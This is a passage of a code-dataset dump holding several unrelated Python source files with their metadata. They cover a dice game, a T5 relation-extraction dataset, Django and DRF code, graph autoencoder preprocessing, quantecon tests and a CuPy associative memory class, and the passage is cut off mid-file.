imprime_abertura()\n\n numero_secreto = random.randrange(1,7)\n\n nivel = escolha_nivel()\n\n while nivel < 1 or nivel > 2:\n nivel = nivel_errado()\n\n if (nivel == 1):\n print(\"Numero do dado é {} :\".format(numero_secreto))\n else:\n print(\"Ok!! Obrigado\")\n\ndef imprime_abertura():\n print(\"*********************************\")\n print(\"Bem vindo ao jogo de Dados!\")\n print(\"*********************************\")\n\n\ndef escolha_nivel():\n print(\"Você quer Jogar dados?\")\n print(\"(1) sim (2) não \")\n\n nivel = int(input(\"\"))\n return nivel\n\n\ndef nivel_errado():\n nivel = int(input(\"Esta opção não existe. Você quer jogar dados (1) sim (2) não : \"))\n return nivel\n\n\nif (__name__ == \"__main__\"):\n jogar()","sub_path":"jogodados.py","file_name":"jogodados.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"533485314","text":"#!/usr/bin/env python3\n\nfrom transformers import T5Tokenizer\n\nimport sys\nsys.dont_write_bytecode = True\nsys.path.append('../Anafora')\n\nimport os, argparse\nfrom tqdm import tqdm\nfrom cassis import *\nfrom dataset_base import ThymeDataset\n\n# ctakes type system types\nrel_type = 'org.apache.ctakes.typesystem.type.relation.TemporalTextRelation'\nevent_type = 'org.apache.ctakes.typesystem.type.textsem.EventMention'\ntime_type = 'org.apache.ctakes.typesystem.type.textsem.TimeMention'\nsent_type = 'org.apache.ctakes.typesystem.type.textspan.Sentence'\n\nclass Data(ThymeDataset):\n \"\"\"Thyme data\"\"\"\n\n def __init__(\n self,\n xmi_dir,\n tokenizer,\n max_input_length,\n max_output_length,\n partition,\n n_files):\n \"\"\"Thyme data\"\"\"\n\n super(Data, self).__init__(\n xmi_dir,\n tokenizer,\n max_input_length,\n max_output_length,\n n_files)\n\n self.partition = partition\n self.event_time_relations()\n\n @staticmethod\n def index_relations(gold_view):\n \"\"\"Map arguments to relation types\"\"\"\n\n rel_lookup = {}\n for rel in gold_view.select(rel_type):\n arg1 = rel.arg1.argument\n arg2 = rel.arg2.argument\n if rel.category == 'CONTAINS':\n rel_lookup[(arg1, arg2)] = rel.category\n\n return rel_lookup\n\n def event_time_relations(self):\n \"\"\"Extract event and time relations\"\"\"\n\n caption = 'event-time relations in %s' % self.partition\n for xmi_path in tqdm(self.xmi_paths, desc=caption):\n\n # does this xmi belong to the sought partition?\n xmi_file_name = xmi_path.split('/')[-1]\n id = int(xmi_file_name.split('_')[0][-3:])\n if id % 8 not in self.splits[self.partition]:\n continue\n\n xmi_file = open(xmi_path, 'rb')\n cas = load_cas_from_xmi(xmi_file, typesystem=self.type_system)\n gold_view = cas.get_view('GoldView')\n sys_view = cas.get_view('_InitialView')\n\n rel_lookup = Data.index_relations(gold_view)\n\n # iterate over sentences extracting relations\n for sent in sys_view.select(sent_type):\n sent_text = sent.get_covered_text().replace('\\n', '')\n\n # extract gold events snad times\n events = []\n for event in gold_view.select_covered(event_type, sent):\n event_text = event.get_covered_text().replace('\\n', '')\n events.append(event_text)\n\n times = []\n for time in gold_view.select_covered(time_type, sent):\n time_text = time.get_covered_text().replace('\\n', '')\n times.append(time_text)\n\n # input string\n input_str = 'task: REL; sent: %s; events: %s; times: %s' % \\\n (sent_text, ', '.join(events), ', '.join(times))\n self.inputs.append(input_str)\n\n rels_in_sent = []\n # now extract event-time relations\n for event in gold_view.select_covered(event_type, sent):\n for time in gold_view.select_covered(time_type, sent):\n\n time_text = time.get_covered_text()\n event_text = event.get_covered_text()\n\n if (time, event) in rel_lookup:\n label = rel_lookup[(time, event)]\n rel_string = '%s(%s, %s)' % (label, time_text, event_text)\n rels_in_sent.append(rel_string)\n\n elif (event, time) in rel_lookup:\n label = rel_lookup[(event, time)]\n rel_string = '%s(%s, %s)' % (label, event_text, time_text)\n rels_in_sent.append(rel_string)\n\n if len(rels_in_sent) == 0:\n self.outputs.append('no event-time relations')\n else:\n self.outputs.append(' '.join(rels_in_sent))\n\n def events_event_relations(self):\n \"\"\"Very eventful\"\"\"\n\n caption = 'event-event relations in %s' % self.partition\n for xmi_path in tqdm(self.xmi_paths, desc=caption):\n\n # does this xmi belong to the sought partition?\n xmi_file_name = xmi_path.split('/')[-1]\n id = int(xmi_file_name.split('_')[0][-3:])\n if id % 8 not in self.splits[self.partition]:\n continue\n\n xmi_file = open(xmi_path, 'rb')\n cas = load_cas_from_xmi(xmi_file, typesystem=self.type_system)\n gold_view = cas.get_view('GoldView')\n sys_view = cas.get_view('_InitialView')\n\n rel_lookup = Data.index_relations(gold_view)\n\n # iterate over sentences extracting relations\n for sent in sys_view.select(sent_type):\n sent_text = sent.get_covered_text().replace('\\n', '')\n self.inputs.append('Relation extraction: ' + sent_text)\n\n rels_in_sent = []\n events_in_sent = list(gold_view.select_covered(event_type, sent))\n for i in range(0, len(events_in_sent)):\n for j in range(i + 1, len(events_in_sent)):\n\n event1 = events_in_sent[i]\n event2 = events_in_sent[j]\n\n if (event1, event2) in rel_lookup:\n label = rel_lookup[(event1, event2)]\n event1_text = event1.get_covered_text()\n event2_text = event2.get_covered_text()\n rel_string = '%s(%s, %s)' % (label, event1_text, event2_text)\n rels_in_sent.append(rel_string)\n\n if (event2, event1) in rel_lookup:\n label = rel_lookup[(event2, event1)]\n event1_text = event1.get_covered_text()\n event2_text = event2.get_covered_text()\n rel_string = '%s(%s, %s)' % (label, event2_text, event1_text)\n rels_in_sent.append(rel_string)\n\n if len(rels_in_sent) == 0:\n self.outputs.append('no event-event relations')\n else:\n self.outputs.append('event-event rels: ' + ' '.join(rels_in_sent))\n\n def extract_all_relations(self):\n \"\"\"Extract ee and et relations\"\"\"\n\n caption = 'all relations in %s' % self.partition\n for xmi_path in tqdm(self.xmi_paths, desc=caption):\n\n # does this xmi belong to the sought partition?\n xmi_file_name = xmi_path.split('/')[-1]\n id = int(xmi_file_name.split('_')[0][-3:])\n if id % 8 not in self.splits[self.partition]:\n continue\n\n xmi_file = open(xmi_path, 'rb')\n cas = load_cas_from_xmi(xmi_file, typesystem=self.type_system)\n gold_view = cas.get_view('GoldView')\n sys_view = cas.get_view('_InitialView')\n\n rel_lookup = Data.index_relations(gold_view)\n\n # iterate over sentences extracting relations\n for sent in sys_view.select(sent_type):\n sent_text = sent.get_covered_text().replace('\\n', '')\n self.inputs.append('Relation extraction: ' + sent_text)\n\n # event-time relations in this sentence\n et_rels_in_sent = []\n\n for event in gold_view.select_covered(event_type, sent):\n for time in gold_view.select_covered(time_type, sent):\n\n if (time, event) in rel_lookup:\n label = rel_lookup[(time, event)]\n time_text = time.get_covered_text()\n event_text = event.get_covered_text()\n rel_string = '%s(%s, %s)' % (label, time_text, event_text)\n et_rels_in_sent.append(rel_string)\n\n if (event, time) in rel_lookup:\n label = rel_lookup[(event, time)]\n time_text = time.get_covered_text()\n event_text = event.get_covered_text()\n rel_string = '%s(%s, %s)' % (label, event_text, time_text)\n et_rels_in_sent.append(rel_string)\n\n et_output = 'event-time relations: '\n if len(et_rels_in_sent) == 0:\n et_output = et_output + 'none'\n else:\n et_output = et_output + ' '.join(et_rels_in_sent)\n\n # event-event relations in this sentence\n ee_rels_in_sent = []\n\n events_in_sent = list(gold_view.select_covered(event_type, sent))\n for i in range(0, len(events_in_sent)):\n for j in range(i + 1, len(events_in_sent)):\n\n event1 = events_in_sent[i]\n event2 = events_in_sent[j]\n\n if (event1, event2) in rel_lookup:\n label = rel_lookup[(event1, event2)]\n event1_text = event1.get_covered_text()\n event2_text = event2.get_covered_text()\n rel_string = '%s(%s, %s)' % (label, event1_text, event2_text)\n ee_rels_in_sent.append(rel_string)\n\n if (event2, event1) in rel_lookup:\n label = rel_lookup[(event2, event1)]\n event1_text = event1.get_covered_text()\n event2_text = event2.get_covered_text()\n rel_string = '%s(%s, %s)' % (label, event2_text, event1_text)\n ee_rels_in_sent.append(rel_string)\n\n ee_output = 'event-event relations: '\n if len(ee_rels_in_sent) == 0:\n ee_output = ee_output + 'none'\n else:\n ee_output = ee_output + ' '.join(ee_rels_in_sent)\n\n self.outputs.append(et_output + '; ' + ee_output)\n\ndef main():\n \"\"\"This is where it happens\"\"\"\n\n tok = T5Tokenizer.from_pretrained('t5-small')\n data = Data(\n xmi_dir=args.xmi_dir,\n tokenizer=tok,\n max_input_length=args.max_input_length,\n max_output_length=args.max_output_length,\n partition=args.partition,\n n_files=args.n_files)\n\n for index in range(len(data)):\n input_ids = data[index]['input_ids']\n output_ids = data[index]['labels']\n print(tok.decode(input_ids, skip_special_tokens=True))\n print(tok.decode(output_ids, skip_special_tokens=True))\n print()\n\nif __name__ == \"__main__\":\n \"\"\"My main man\"\"\"\n\n base = os.environ['DATA_ROOT']\n arg_dict = dict(\n xmi_dir=os.path.join(base, 'Thyme/Xmi/'),\n model_dir='Model/',\n model_name='t5-small',\n max_input_length=200,\n max_output_length=200,\n partition='dev',\n n_files=5)\n\n args = argparse.Namespace(**arg_dict)\n print('hyper-parameters: %s\\n' % args)\n\n main()\n","sub_path":"Archive/T5/dataset_rel.py","file_name":"dataset_rel.py","file_ext":"py","file_size_in_byte":9675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"619517096","text":"# __str__:\r\n# 触发时机: 打印对象名 自动触发去调用__str__里面的内容\r\n# 注意: 一定要在__str__方法中添加return,return后面内容就是打印对象看到内容\r\n\r\nclass Person:\r\n def __init__(self, name, age):\r\n self.name = name\r\n self.age = age\r\n\r\n def __str__(self):\r\n return '姓名是:' + self.name + ',年龄:' + str(self.age)\r\n\r\n\r\np = Person('tom', 18)\r\nprint(p)\r\n\r\n# 单纯打印对象名称,出来的是一个地址。地址对于开发者来书没有太大意义\r\n# 如果想在打印对象名的时候能够给开发者更多一些信息量,\r\n\r\np1 = Person('jack', 20)\r\nprint(p1)\r\n\r\n'''\r\n总结:魔术方法\r\n重点:\r\n__init__ (构造方法,创建完空间之后调用的第一个方法), __str__\r\n\r\n了解:\r\n__new__ 作用 开辟空间 \r\n\r\n__del__ 作用 没有指针引用的时候会调用。99%都不需要重写\r\n\r\n__call__ 作用: 想不想将对象当成函数用。\r\n\r\n\r\n大总结:\r\n方法:\r\n 普通方法 ---》 重点\r\n def 方法名(self,[参数]):\r\n 方法体\r\n \r\n 对象.方法()\r\n \r\n 方法之间的调用:\r\n class A:\r\n def a(self):\r\n pass\r\n def b(self):\r\n # 调用a方法\r\n self.a()\r\n \r\n 类方法: \r\n @classmethod \r\n def 方法名(cls,[参数]):\r\n pass\r\n \r\n 类名.方法名()\r\n 对象.方法名()\r\n \r\n 静态方法: \r\n @staticmethod\r\n def 方法名([参数]):\r\n pass\r\n \r\n 类名.方法名()\r\n 对象.方法名()\r\n \r\n 魔术方法:\r\n 自动执行方法\r\n \r\n print(p) ---> __str__\r\n\r\n'''\r\n","sub_path":"Week4(56集)/day15(11集)/代码/day15_面向对象/object09.py","file_name":"object09.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"532989023","text":"\n\n\ndef word_count(s):\n ignored = \"\\\":;,.-+=/\\|[]{}()*^&?!\"\n results = {}\n\n # translation_table = dict.fromkeys(map(ord, '\"{:;,.-+=/|\\[]}()*^&\"'), None)\n #\n # s = s.translate(translation_table)\n #\n # print(s)\n\n if s:\n\n for char in ignored:\n s = s.replace(char, \"\")\n\n words = s.lower().split(' ')\n while '' in words:\n words.remove('')\n\n for i in range(len(words)):\n words[i] = words[i].strip()\n\n for word in words:\n if word in results:\n results[word] += 1\n else:\n results[word] = 1\n\n return results\n\n if not s:\n\n return results\n\n # count each word and return the count\n # remove special characters\n # convert string to lowercase\n # we are not ignoring apostrophes\n # if letter is in dict remove it from array\n\n\n'''\n{'hello': 2, 'my': 2, 'cat': 2, 'and': 1, \"doesn't\": 1, 'say': 1, 'back': 1}\n'''\n#\nif __name__ == \"__main__\":\n x = word_count(\"\")\n print(\"expected outcome {}\")\n print(f\"Outcome: {x}\")\n\n\n x = word_count(\"Hello hello\")\n print(\"expected outcome {\"\"hello\"\": 2}\")\n print(f\"Outcome: {x}\")\n #\n # print(\"expected outcome {\"\"hello\"\": 2}\")\n # print(f\"Outcome: {x}\")\n\n x = word_count('a a\\ra\\na\\ta \\t\\r\\n')\n # print(f\"expected outcome: \"'a'\": 5\")\n # print(f\"Outcome: {x}\")\n\n # white_chars = [c for c in x.whitespace]\n\n # for i in x:\n # x[i] = str(x[i])\n # white_chars = [c for c in x[i].whitespace]\n\n # x = (word_count(\"\"))\n #\n # print(x)\n #\n # if x == {}:\n # print(\"success\")\n\n\n # print(word_count(\"Hello hello\"))\n # print(word_count('Hello, my cat. And my cat doesn\\'t say \"hello\" back.'))\n # print(word_count('This is a test of the emergency broadcast network. This is only a test.'))\n\n","sub_path":"applications/word_count/word_count.py","file_name":"word_count.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"45104906","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\nfrom django.conf.urls import include, url\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.index, name='index'),\n url(r'^carrera/', views.ListaCarrera, name='ListaCarrera'),\n url(r'^piloto/', views.ListaPiloto, name='ListaPiloto'),\n url(r'^registro/', views.ListaRegistro, name='ListaRegistro'),\n url(r'^nuevaCarrera/', views.NuevaCarrera, name='NuevaCarrera'),\n url(r'^nuevoPiloto/', views.NuevoPiloto, name='NuevoPiloto'),\n url(r'^nuevoRegistro/', views.NuevoRegistro, name='NuevoRegistro'),\n\n]\n","sub_path":"auto/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"550016365","text":"from rest_framework.authentication import SessionAuthentication, BaseAuthentication\nfrom rest_framework import routers, serializers,viewsets,permissions\nfrom rest_framework_jwt.authentication import JSONWebTokenAuthentication\nfrom rest_framework.reverse import reverse\n\nfrom django.contrib.postgres.fields import JSONField\nimport json\n\nfrom .models import Device\n\nfrom cooperate.serializers import BranchSerializer\n\n\nclass DeviceCreateSerializer(serializers.ModelSerializer):\n class Meta:\n model = Device\n fields= [\n 'result',\n 'user',\n 'branch'\n ]\n\n# class JSONSerializerField(serializers.JSONField):\n# \"\"\" Serializer for JSONField -- required to make field writable\"\"\"\n# def to_internal_value(self, data):\n# return data\n# def to_representation(self, value):\n# return value\n#\n# class JSONField(serializers.Field):\n# def to_representation(self, obj):\n# return json.loads(obj)\n#\n# def to_internal_value(self, data):\n# return json.dumps(data)\n\nclass DeviceUpdateSerializer(serializers.ModelSerializer):\n # user = serializers.CharField(source='user.username', read_only=True)\n class Meta:\n model = Device\n fields = [\n 'id',\n 'timestamp',\n 'result',\n 'user',\n 'branch'\n ]\n\n\n\n# class DeviceUrlHyperlinkedIdentifyField(serializers.HyperlinkedIdentityField):\n# # lookup_field = 'id'\n# # pass\n#\n# def get_url(self,obj, view_name, request, format):\n# kwargs = {\n# \"id\" : obj.id\n# }\n# return reverse(view_name, kwargs= kwargs, request = request, format= format )\n\n\n\nclass DeviceSerializer(serializers.HyperlinkedModelSerializer):\n # url = DeviceUrlHyperlinkedIdentifyField(view_name='device_detail_api')\n url = serializers.HyperlinkedIdentityField('device_detail_api', lookup_field='pk')\n class Meta:\n model = Device\n fields = [\n 'id',\n 'timestamp',\n 'result',\n 'url'\n\n ]\n\nclass DeviceViewSet(viewsets.ModelViewSet):\n authentication_classes = [BaseAuthentication, JSONWebTokenAuthentication]\n permission_classes = [permissions.IsAuthenticated]\n queryset = Device.objects.all()\n serializer_class = DeviceSerializer\n\n\n\n","sub_path":"source/device/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"66535677","text":"import numpy as np\nimport scipy.sparse as sp\n\n\ndef sparse_to_tuple(sparse_mx):\n if not sp.isspmatrix_coo(sparse_mx):\n sparse_mx = sparse_mx.tocoo()\n coords = np.vstack((sparse_mx.row, sparse_mx.col)).transpose()\n values = sparse_mx.data\n shape = sparse_mx.shape\n return coords, values, shape\n\n\ndef preprocess_graph(adj):\n adj = sp.coo_matrix(adj)\n adj_ = adj + sp.eye(adj.shape[0])\n rowsum = np.array(adj_.sum(1))\n degree_mat_inv_sqrt = sp.diags(np.power(rowsum, -0.5).flatten())\n adj_normalized = adj_.dot(degree_mat_inv_sqrt).transpose().dot(degree_mat_inv_sqrt).tocoo()\n return sparse_to_tuple(adj_normalized)\n\n\ndef construct_feed_dict(adj_normalized, adj, features, placeholders):\n # construct feed dictionary\n feed_dict = dict()\n feed_dict.update({placeholders['features']: features})\n feed_dict.update({placeholders['adj']: adj_normalized})\n feed_dict.update({placeholders['adj_orig']: adj})\n return feed_dict\n\n\ndef old_mask_test_edges(adj):\n # Function to build test set with 10% positive links\n # NOTE: Splits are randomized and results might slightly deviate from reported numbers in the paper.\n # TODO: Clean up.\n\n # Remove diagonal elements\n adj = adj - sp.dia_matrix((adj.diagonal()[np.newaxis, :], [0]), shape=adj.shape)\n adj.eliminate_zeros()\n # Check that diag is zero:\n assert np.diag(adj.todense()).sum() == 0\n\n adj_triu = sp.triu(adj)\n adj_tuple = sparse_to_tuple(adj_triu)\n edges = adj_tuple[0]\n edges_all = sparse_to_tuple(adj)[0]\n num_test = int(np.floor(edges.shape[0] / 10.))\n num_val = int(np.floor(edges.shape[0] / 20.))\n\n all_edge_idx = list(range(edges.shape[0]))\n np.random.shuffle(all_edge_idx)\n val_edge_idx = all_edge_idx[:num_val]\n test_edge_idx = all_edge_idx[num_val:(num_val + num_test)]\n test_edges = edges[test_edge_idx]\n val_edges = edges[val_edge_idx]\n train_edges = np.delete(edges, np.hstack([test_edge_idx, val_edge_idx]), axis=0)\n\n def ismember(a, b, tol=5):\n rows_close = np.all(np.round(a - b[:, None], tol) == 0, axis=-1)\n return np.any(rows_close)\n\n # creates list of edges not in the original graph for link prediction testing\n test_edges_false = []\n while len(test_edges_false) < len(test_edges):\n idx_i = np.random.randint(0, adj.shape[0])\n idx_j = np.random.randint(0, adj.shape[0])\n if idx_i == idx_j:\n continue\n if ismember([idx_i, idx_j], edges_all):\n continue\n if test_edges_false:\n if ismember([idx_j, idx_i], np.array(test_edges_false)):\n continue\n if ismember([idx_i, idx_j], np.array(test_edges_false)):\n continue\n test_edges_false.append([idx_i, idx_j])\n\n # creates list of edges not in the original graph for link prediction validation\n val_edges_false = []\n while len(val_edges_false) < len(val_edges):\n idx_i = np.random.randint(0, adj.shape[0])\n idx_j = np.random.randint(0, adj.shape[0])\n if idx_i == idx_j:\n continue\n if ismember([idx_i, idx_j], train_edges):\n continue\n if ismember([idx_j, idx_i], train_edges):\n continue\n if ismember([idx_i, idx_j], val_edges):\n continue\n if ismember([idx_j, idx_i], val_edges):\n continue\n if val_edges_false:\n if ismember([idx_j, idx_i], np.array(val_edges_false)):\n continue\n if ismember([idx_i, idx_j], np.array(val_edges_false)):\n continue\n val_edges_false.append([idx_i, idx_j])\n\n assert ~ismember(test_edges_false, edges_all)\n assert ~ismember(val_edges_false, edges_all)\n assert ~ismember(val_edges, train_edges)\n assert ~ismember(test_edges, train_edges)\n assert ~ismember(val_edges, test_edges)\n\n data = np.ones(train_edges.shape[0])\n\n # Re-build adj matrix\n adj_train = sp.csr_matrix((data, (train_edges[:, 0], train_edges[:, 1])), shape=adj.shape)\n adj_train = adj_train + adj_train.T\n\n # NOTE: these edge lists only contain single direction of edge!\n return adj_train, train_edges, val_edges, val_edges_false, test_edges, test_edges_false\n\n\ndef mask_test_edges(adj, val_perc=5., test_perc=10.):\n # Function to build test set with 10% positive links\n # NOTE: Splits are randomized and results might slightly deviate from reported numbers in the paper.\n\n # Remove diagonal elements\n adj = adj - sp.dia_matrix((adj.diagonal()[np.newaxis, :], [0]), shape=adj.shape)\n adj.eliminate_zeros()\n # Check that diag is zero:\n assert np.diag(adj.todense()).sum() == 0\n\n adj_triu = sp.triu(adj)\n adj_tuple = sparse_to_tuple(adj_triu)\n edges = adj_tuple[0]\n edges_all = sparse_to_tuple(adj)[0]\n num_test = int(np.floor(edges.shape[0] / test_perc))\n num_val = int(np.floor(edges.shape[0] / val_perc))\n\n all_edge_idx = list(range(edges.shape[0]))\n np.random.shuffle(all_edge_idx)\n val_edge_idx = all_edge_idx[:num_val]\n test_edge_idx = all_edge_idx[num_val:(num_val + num_test)]\n test_edges = edges[test_edge_idx]\n val_edges = edges[val_edge_idx]\n train_edges = np.delete(edges, np.hstack([test_edge_idx, val_edge_idx]), axis=0)\n\n # To generate the negative samples we use the following procedure:\n # 1. Construct a full dense matrix\n # 2. Remove the already existing edges of the graph leaving only the negative edges\n # 3. Shuffle the indexes of the remaining negative edges\n # 4. Use the proper amount of edges for validation and testing.\n\n # Step 1.\n full_dense = np.ones(adj.shape)\n S_full = sp.csr_matrix(full_dense)\n # Step 2.\n S_negative = S_full - adj\n S_negative_triu = sp.triu(S_negative)\n idx_false = sparse_to_tuple(S_negative_triu)[0]\n\n # Step 3.\n false_edges_idx = list(range(idx_false.shape[0]))\n np.random.shuffle(false_edges_idx)\n\n # Step 4.\n val_edges_false_idx = false_edges_idx[:num_val]\n test_edges_false_idx = false_edges_idx[num_val:(num_val + num_test)]\n val_edges_false = idx_false[val_edges_false_idx]\n test_edges_false = idx_false[test_edges_false_idx]\n\n def ismember(a, b, tol=5):\n rows_close = np.all(np.round(a - b[:, None], tol) == 0, axis=-1)\n return np.any(rows_close)\n\n assert ~ismember(test_edges_false, edges_all)\n assert ~ismember(val_edges_false, edges_all)\n assert ~ismember(val_edges, train_edges)\n assert ~ismember(test_edges, train_edges)\n assert ~ismember(val_edges, test_edges)\n\n data = np.ones(train_edges.shape[0])\n\n # Re-build adj matrix\n adj_train = sp.csr_matrix((data, (train_edges[:, 0], train_edges[:, 1])), shape=adj.shape)\n adj_train = adj_train + adj_train.T\n\n # NOTE: these edge lists only contain single direction of edge!\n return adj_train, train_edges, val_edges, val_edges_false, test_edges, test_edges_false\n","sub_path":"src/gae/gae/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"38603402","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/quantecon/tests/test_compute_fp.py\n# Compiled at: 2019-07-07 21:19:40\n# Size of source mod 2**32: 4809 bytes\n\"\"\"\nTests for compute_fp.py\n\nReferences\n----------\n\nhttps://www.math.ucdavis.edu/~hunter/book/ch3.pdf\n\nTODO: add multivariate case\n\n\"\"\"\nimport unittest, numpy as np\nfrom nose.tools import ok_, raises\nfrom quantecon import compute_fixed_point\n\nclass TestFPLogisticEquation(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.mu_1 = 0.2\n cls.mu_2 = 0.3\n cls.unit_inverval = [\n 0.1, 0.3, 0.6, 0.9]\n cls.kwargs = {'error_tol':1e-05, \n 'max_iter':200, 'verbose':0}\n\n def T(self, x, mu):\n return 4.0 * mu * x * (1.0 - x)\n\n def test_contraction_1(self):\n \"\"\"compute_fp: convergence inside interval of convergence\"\"\"\n f = lambda x: self.T(x, self.mu_1)\n for i in self.unit_inverval:\n self.assertTrue(abs(compute_fixed_point(f, i, **self.kwargs)) < 0.0001)\n\n def test_not_contraction_2(self):\n \"\"\"compute_fp: no convergence outside interval of convergence\"\"\"\n f = lambda x: self.T(x, self.mu_2)\n for i in self.unit_inverval:\n self.assertFalse(abs(compute_fixed_point(f, i, **self.kwargs)) < 0.0001)\n\n def test_contraction_2(self):\n \"\"\"compute_fp: convergence inside interval of convergence\"\"\"\n f = lambda x: self.T(x, self.mu_2)\n fp = (4 * self.mu_2 - 1) / (4 * self.mu_2)\n for i in self.unit_inverval:\n self.assertTrue(abs(compute_fixed_point(f, i, **self.kwargs) - fp) < 0.0001)\n\n def test_not_contraction_1(self):\n \"\"\"compute_fp: no convergence outside interval of convergence\"\"\"\n f = lambda x: self.T(x, self.mu_1)\n fp = (4 * self.mu_1 - 1) / (4 * self.mu_1)\n for i in self.unit_inverval:\n self.assertFalse(abs(compute_fixed_point(f, i, **self.kwargs) - fp) < 0.0001)\n\n def test_imitation_game_method(self):\n \"\"\"compute_fp: Test imitation game method\"\"\"\n method = 'imitation_game'\n error_tol = self.kwargs['error_tol']\n for mu in [self.mu_1, self.mu_2]:\n for i in self.unit_inverval:\n fp_computed = compute_fixed_point(self.T, i, method=method, mu=mu, **self.kwargs)\n self.assertTrue(abs(self.T(fp_computed, mu=mu) - fp_computed) <= error_tol)\n\n i = np.asarray(self.unit_inverval)\n fp_computed = compute_fixed_point(self.T, i, method=method, mu=mu, **self.kwargs)\n self.assertTrue(abs(self.T(fp_computed, mu=mu) - fp_computed).max() <= error_tol)\n\n\nclass TestComputeFPContraction:\n\n def setUp(self):\n self.coeff = 0.5\n self.methods = ['iteration', 'imitation_game']\n\n def f(self, x):\n return self.coeff * x\n\n def test_num_iter_one(self):\n init = 1.0\n error_tol = self.coeff\n for method in self.methods:\n fp_computed = compute_fixed_point((self.f), init, error_tol=error_tol,\n method=method)\n ok_(fp_computed <= error_tol * 2)\n\n def test_num_iter_large(self):\n init = 1.0\n buff_size = 256\n max_iter = buff_size + 2\n error_tol = self.coeff ** max_iter\n for method in self.methods:\n fp_computed = compute_fixed_point((self.f), init, error_tol=error_tol,\n max_iter=max_iter,\n method=method,\n print_skip=max_iter)\n ok_(fp_computed <= error_tol * 2)\n\n def test_2d_input(self):\n error_tol = self.coeff ** 4\n for method in self.methods:\n init = np.array([[-1, 0.5], [-0.3333333333333333, 0.1]])\n fp_computed = compute_fixed_point((self.f), init, error_tol=error_tol,\n method=method)\n ok_((fp_computed <= error_tol * 2).all())\n\n\n@raises(ValueError)\ndef test_raises_value_error_nonpositive_max_iter():\n f = lambda x: 0.5 * x\n init = 1.0\n max_iter = 0\n compute_fixed_point(f, init, max_iter=max_iter)","sub_path":"pycfiles/quantecon-0.4.6-py3.7/test_compute_fp.cpython-37.py","file_name":"test_compute_fp.cpython-37.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"501237085","text":"import numpy as np\n\nN = 7 # Nº of species\n\ndeltas = np.array(\n # [0.27, -0.3] # Phase shifts for N = 2\n [-0.27, 0, 0.27] # Phase shifts for N = 3\n ) # Ignored otherwise\n\nr = 0.333 # Environment parameter\ng = 1 # Growth parameter\na = 0.8 # Growth amplitude\nb = 0.6 # Competition amplitude\n\ndt = 0.01\ni_max = 100000\nprint_every = 10\nseed_n = 12345\n\nresults_dir = \"general_a_0.8\"\n\n","sub_path":"general_a_0.8/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"239671573","text":"#!/usr/bin/env python\n\n# Created by Raul Peralta-Lozada\n# GPU version added by Ivan Torres-Rodriguez\nimport cupy\nimport numpy\n\n\nclass AssociativeMemoryError(Exception):\n pass\n\n\nclass AssociativeMemory(object):\n def __init__(self, n: int, m: int):\n \"\"\"\n Parameters\n ----------\n n : int\n The size of the domain.\n m : int\n The size of the range.\n \"\"\"\n self.n = n\n self.m = m\n self.grid = cupy.zeros((self.m, self.n), dtype=cupy.bool)\n\n def __str__(self):\n grid = cupy.zeros(self.grid.shape, dtype=cupy.unicode)\n grid[:] = 'O'\n r, c = cupy.nonzero(self.grid)\n for i in zip(r, c):\n grid[i] = 'X'\n return str(grid)\n\n @property\n def n(self):\n return self._n\n\n @n.setter\n def n(self, value: int):\n if value > 0:\n self._n = value\n else:\n raise ValueError('Invalid value for n.')\n\n @property\n def m(self):\n return self._m\n\n @m.setter\n def m(self, value: int):\n if value > 0:\n self._m = value\n else:\n raise ValueError('Invalid value for m.')\n\n @property\n def grid(self):\n return self._grid\n\n @grid.setter\n def grid(self, new_grid: cupy.ndarray):\n if (isinstance(new_grid, cupy.ndarray) and\n new_grid.dtype == cupy.bool and\n new_grid.shape == (self.m, self.n)):\n self._grid = new_grid\n else:\n raise ValueError('Invalid grid assignment.')\n\n @property\n def entropy(self) -> float:\n \"\"\"Return the entropy of the Associative Memory.\"\"\"\n e = 0.0 # entropy\n v = self.grid.sum(axis=0) # number of marked cells in the columns\n for vi in v:\n if vi != 0:\n e += cupy.log2(1. / vi)\n e *= (-1.0 / self.n)\n return e\n\n @classmethod\n def from_grid(cls, grid: cupy.ndarray) -> 'AssociativeMemory':\n associative_mem = cls(grid.shape[1], grid.shape[0])\n associative_mem.grid = grid\n return associative_mem\n\n @staticmethod\n def vector_to_grid(vector, input_range, min_value):\n # now is only binary\n vector = cupy.ravel(vector)\n n = vector.size\n if vector.max() > input_range or vector.min() < min_value:\n raise ValueError('Values in the input vector are invalid. ',input_range,vector.max(),vector.min())\n grid = cupy.zeros((input_range, n), cupy.bool)\n vector -= min_value\n grid[vector, cupy.arange(vector.shape[0])] = True\n grid = cupy.flipud(grid)\n return grid\n \n @staticmethod\n def vector_to_grid_pad(vector, input_range, min_value, padding=1):\n # now is only binary\n vector = cupy.ravel(vector)\n n = vector.size\n if vector.max() > input_range or vector.min() < min_value:\n raise ValueError('Values in the input vector are invalid. ',input_range,vector.max(),vector.min())\n grid = cupy.zeros((input_range, n), 